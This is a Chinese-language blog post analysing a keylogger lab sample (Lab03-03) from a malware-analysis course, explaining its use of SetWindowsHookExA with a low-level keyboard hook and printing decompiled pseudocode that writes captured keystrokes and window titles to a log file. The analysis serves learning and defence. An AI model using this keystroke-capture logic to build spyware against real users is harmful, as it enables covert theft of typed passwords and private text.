<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="scr1pt"><title>keylog · scr1pt's blog</title><meta name="description" content="样本来源：lab03-03
md5: e2bf42217a67e46433da8b6f4507219e

动态解密资源里的PE后得到了keylog的代码部分。这里不写。
keylog Analysis通过伪代码我可以很清楚得看到keylog的几步

FindWindowA
ShowWindow
Ge"><meta name="keywords" content="Blog,博客,Hexo"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="shortcut icon" type="image/x-icon" href="/images/scr1pt.jpg"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="stylesheet" href="/css/insight.css"><link rel="stylesheet" href="/css/search.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><script src="/js/jquery.js"></script><meta name="generator" content="Hexo 6.1.0"></head><body><div class="page-top animated fadeInDown"><div class="nav"><li> <a href="/">Home</a></li><li> <a href="/archives">Archives</a></li><li> <a href="/tags">Tags</a></li><li> <a href="/about">About</a></li><li> <a href="/links">Links</a></li></div><div class="information"><div class="nav_right_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li><li><a class="fa fa-search" onclick="openWindow();"></a></li></div><div class="avatar"><img src="/images/scr1pt.jpg"></div></div></div><div class="sidebar animated fadeInDown"><div class="sidebar-top"><div class="logo-title"><div class="title"><img src="/images/scr1pt.jpg" style="width:200px;" alt="favicon"><h3 title=""><a href="/">scr1pt's blog</a></h3><div class="description"><p>my dear virus, please fuck me</p></div></div><ul class="social-links"><li><a target="_blank" rel="noopener" href="https://github.com/scr1pt-kid"><i class="fa fa-github"></i></a></li><li><a href="mailto:2466811523@qq.com"><i class="fa fa-envelope"></i></a></li><li><a target="_blank" rel="noopener" href="http://sighttp.qq.com/authd?IDKEY=2466811523"><i class="fa fa-qq"></i></a></li></ul></div></div><div class="footer"><div class="p"> <span> 全站CC-BY-SA-3.0 </span><i class="fa fa-star"></i><span> scr1pt</span></div><div class="by_farbox"><span>Powered by </span><a href="https://hexo.io/zh-cn/" target="_blank">Hexo </a><span> & </span><span>Anatolo </span></div><div class="beian"></div></div></div><div class="main"><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>keylog</a></h3></div><div class="post-content"><p><blockquote>
<p>样本来源：lab03-03</p>
<p>md5: e2bf42217a67e46433da8b6f4507219e</p>
</blockquote>
<p>动态解密资源里的PE后得到了keylog的代码部分。这里不写。</p>
<h2 id="keylog-Analysis"><a href="#keylog-Analysis" class="headerlink" title="keylog Analysis"></a>keylog Analysis</h2><p>通过伪代码我可以很清楚得看到keylog的几步</p>
<ul>
<li>FindWindowA</li>
<li>ShowWindow</li>
<li>GetModuleHandleA</li>
<li>SetWindowHookExA</li>
<li>unhookWindowsHookEx</li>
</ul>
<span id="more"></span>

<p><img src="https://gitee.com/No-day/for-picgo/raw/master/image-20220401154624110.png" alt="image-20220401154624110"></p>
<p>而其中最重要的就是<code>SetWindowHookExA</code>和<code>UnhookWindowsHookEx</code>两个函数了</p>
<p>这里需要注意，如果要下dll断点时，我们的断点应该打在<code>user32.dll</code>.</p>
<h3 id="SetWindowsHookExA"><a href="#SetWindowsHookExA" class="headerlink" title="SetWindowsHookExA"></a>SetWindowsHookExA</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">HHOOK <span class="title function_">SetWindowsHookExA</span><span class="params">(</span></span><br><span class="line"><span class="params">  [in] <span class="type">int</span>       idHook,</span></span><br><span class="line"><span class="params">  [in] HOOKPROC  lpfn,</span></span><br><span class="line"><span class="params">  [in] HINSTANCE hmod,</span></span><br><span class="line"><span class="params">  [in] DWORD     dwThreadId</span></span><br><span class="line"><span class="params">)</span>;</span><br></pre></td></tr></table></figure>

<h4 id="idhook"><a href="#idhook" class="headerlink" title="idhook"></a>idhook</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[in] idHook</span><br></pre></td></tr></table></figure>

<p>Type: <strong>int</strong></p>
<p>The type of hook procedure to be installed. This parameter can be one of the following values.</p>
<table>
<thead>
<tr>
<th>Value</th>
<th>Meaning</th>
</tr>
</thead>
<tbody><tr>
<td><strong>WH_CALLWNDPROC</strong> 4</td>
<td>Installs a hook procedure that monitors messages before the system sends them to the destination window procedure. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644975(v=vs.85)">CallWndProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_CALLWNDPROCRET</strong> 12</td>
<td>Installs a hook procedure that monitors messages after they have been  processed by the destination window procedure. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nc-winuser-hookproc">CallWndRetProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_CBT</strong> 5</td>
<td>Installs a hook procedure that receives notifications useful to a CBT application. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644977(v=vs.85)">CBTProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_DEBUG</strong> 9</td>
<td>Installs a hook procedure useful for debugging other hook procedures. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644978(v=vs.85)">DebugProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_FOREGROUNDIDLE</strong> 11</td>
<td>Installs a hook procedure that will be called when the application’s  foreground thread is about to become idle. This hook is useful for  performing low priority tasks during idle time. For more information,  see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644980(v=vs.85)">ForegroundIdleProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_GETMESSAGE</strong> 3</td>
<td>Installs a hook procedure that monitors messages posted to a message queue. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644981(v=vs.85)">GetMsgProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_JOURNALPLAYBACK</strong> 1</td>
<td>Installs a hook procedure that posts messages previously recorded by a <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/desktop/winmsg/about-hooks">WH_JOURNALRECORD</a> hook procedure. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644982(v=vs.85)">JournalPlaybackProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_JOURNALRECORD</strong> 0</td>
<td>Installs a hook procedure that records input messages posted to the  system message queue. This hook is useful for recording macros. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644983(v=vs.85)">JournalRecordProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_KEYBOARD</strong> 2</td>
<td>Installs a hook procedure that monitors keystroke messages. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644984(v=vs.85)">KeyboardProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_KEYBOARD_LL</strong> 13</td>
<td>Installs a hook procedure that monitors low-level keyboard input events. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644985(v=vs.85)">LowLevelKeyboardProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_MOUSE</strong> 7</td>
<td>Installs a hook procedure that monitors mouse messages. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644988(v=vs.85)">MouseProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_MOUSE_LL</strong> 14</td>
<td>Installs a hook procedure that monitors low-level mouse input events. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644986(v=vs.85)">LowLevelMouseProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_MSGFILTER</strong> -1</td>
<td>Installs a hook procedure that monitors messages generated as a result  of an input event in a dialog box, message box, menu, or scroll bar. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644987(v=vs.85)">MessageProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_SHELL</strong> 10</td>
<td>Installs a hook procedure that receives notifications useful to shell applications. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644991(v=vs.85)">ShellProc</a> hook procedure.</td>
</tr>
<tr>
<td><strong>WH_SYSMSGFILTER</strong> 6</td>
<td>Installs a hook procedure that monitors messages generated as a result  of an input event in a dialog box, message box, menu, or scroll bar. The hook procedure monitors these messages for all applications in the same desktop as the calling thread. For more information, see the <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644992(v=vs.85)">SysMsgProc</a> hook procedure.</td>
</tr>
</tbody></table>
<p>这里是<code>WH_KEYBOARD_LL 13</code>，也就是<code>Installs a hook procedure that monitors low-level keyboard input events. For more information, see the [LowLevelKeyboardProc](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644985(v=vs.85)) hook procedure.</code> </p>
<h4 id="lpfn"><a href="#lpfn" class="headerlink" title="lpfn"></a>lpfn</h4><blockquote>
<p>A pointer to the hook procedure. If the <em>dwThreadId</em> parameter is zero or specifies the identifier of a thread created by a different process, the <em>lpfn</em> parameter must point to a hook procedure in a DLL. Otherwise, <em>lpfn</em> can point to a hook procedure in the code associated with the current process.</p>
</blockquote>
<p><code>lpfn</code>传的是hook的函数</p>
<p><img src="https://gitee.com/No-day/for-picgo/raw/master/image-20220401160445399.png" alt="image-20220401160445399"></p>
<p>它对回调函数<code>LowLevelKeyboardProc</code>进行了hook</p>
<p><img src="https://gitee.com/No-day/for-picgo/raw/master/image-20220401161742632.png" alt="image-20220401161742632"></p>
<p><code>sub_4010C7</code>函数存的是对键盘码的处理,这里是写入到了<code>practicalmalwareanalysis.log</code>文件中</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( result != <span class="number">-1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    SetFilePointer(result, <span class="number">0</span>, <span class="number">0</span>, <span class="number">2u</span>);</span><br><span class="line">    ForegroundWindow = GetForegroundWindow();</span><br><span class="line">    GetWindowTextA(ForegroundWindow, Str2, <span class="number">1024</span>);</span><br><span class="line">    <span class="keyword">if</span> ( <span class="built_in">strcmp</span>(Str1, Str2) )</span><br><span class="line">    &#123;</span><br><span class="line">      WriteFile(hFile, aWindow, <span class="number">0xC</span>u, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">      v3 = <span class="built_in">strlen</span>(Str2);</span><br><span class="line">      WriteFile(hFile, Str2, v3, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">      WriteFile(hFile, asc_40503C, <span class="number">4u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">      <span class="built_in">strncpy</span>(Str1, Str2, <span class="number">0x3FF</span>u);</span><br><span class="line">      byte_40574F = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( Buffer &lt; <span class="number">39</span> || Buffer &gt; <span class="number">64</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( Buffer &lt;= <span class="number">64</span> || Buffer &gt;= <span class="number">91</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">switch</span> ( Buffer )</span><br><span class="line">        &#123;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">8u</span>:</span><br><span class="line">            v4 = <span class="built_in">strlen</span>(aBackspace);</span><br><span class="line">            WriteFile(hFile, aBackspace_0, v4, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">9u</span>:</span><br><span class="line">            WriteFile(hFile, aTab, <span class="number">5u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0xD</span>u:</span><br><span class="line">            WriteFile(hFile, aEnter, <span class="number">8u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x10</span>u:</span><br><span class="line">            WriteFile(hFile, aShift, <span class="number">7u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x11</span>u:</span><br><span class="line">            WriteFile(hFile, aCtrl, <span class="number">6u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x14</span>u:</span><br><span class="line">            v5 = <span class="built_in">strlen</span>(aCapsLock);</span><br><span class="line">            WriteFile(hFile, aCapsLock_0, v5, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x20</span>u:</span><br><span class="line">            WriteFile(hFile, asc_405074, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x2E</span>u:</span><br><span class="line">            WriteFile(hFile, aDel, <span class="number">5u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x60</span>u:</span><br><span class="line">            WriteFile(hFile, a0, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x61</span>u:</span><br><span class="line">            WriteFile(hFile, a1, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x62</span>u:</span><br><span class="line">            WriteFile(hFile, a2, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x63</span>u:</span><br><span class="line">            WriteFile(hFile, a3, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x64</span>u:</span><br><span class="line">            WriteFile(hFile, a4, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x65</span>u:</span><br><span class="line">            WriteFile(hFile, a5, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x66</span>u:</span><br><span class="line">            WriteFile(hFile, a6, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x67</span>u:</span><br><span class="line">            WriteFile(hFile, a7, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x68</span>u:</span><br><span class="line">            WriteFile(hFile, a8, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">case</span> <span class="number">0x69</span>u:</span><br><span class="line">            WriteFile(hFile, a9, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          <span class="keyword">default</span>:</span><br><span class="line">            <span class="keyword">return</span> CloseHandle(hFile);</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">      &#123;</span><br><span class="line">        Buffer += <span class="number">32</span>;</span><br><span class="line">        WriteFile(hFile, &amp;Buffer, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      WriteFile(hFile, &amp;Buffer, <span class="number">1u</span>, &amp;NumberOfBytesWritten, <span class="number">0</span>);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

</p><div class="tip">本文采用CC-BY-SA-3.0协议，转载请注明出处<br>Author: scr1pt</div></div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2022-04-01</span><i class="fa fa-tag"></i><span class="leancloud_visitors"></span><span>About 952 words, 3 min 10 sec  read</span></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="" onclick="javascript:join_favorite()" ref="sidebar"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/home?status=,https://Scr1pt-kid.github.io/2022/04/01/keylog/,scr1pt's blog,keylog,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2022/04/04/oep-tricks/" title="oep_tricks">Previous</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2022/03/29/mining-sh-analysis/" title="mining-sh-analysis">Next</a></li></ul></div><script src="/js/visitors.js"></script></div></div></div></div><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script><script src="/js/add-bookmark.js"></script><script>(function(window){var INSIGHT_CONFIG={TRANSLATION:{POSTS:"Posts",PAGES:"Pages",CATEGORIES:"Categories",TAGS:"Tags",UNTITLED:"(Untitled)",},CONTENT_URL:"/content.json",};window.INSIGHT_CONFIG=INSIGHT_CONFIG})(window);</script><script src="/js/insight.js" defer></script><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Search..."><span class="searchbox-close"><a class="fa fa-times-circle" onclick="closeWindow();"></a></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"><p>Seraching...</p></div></div></div></div></body></html>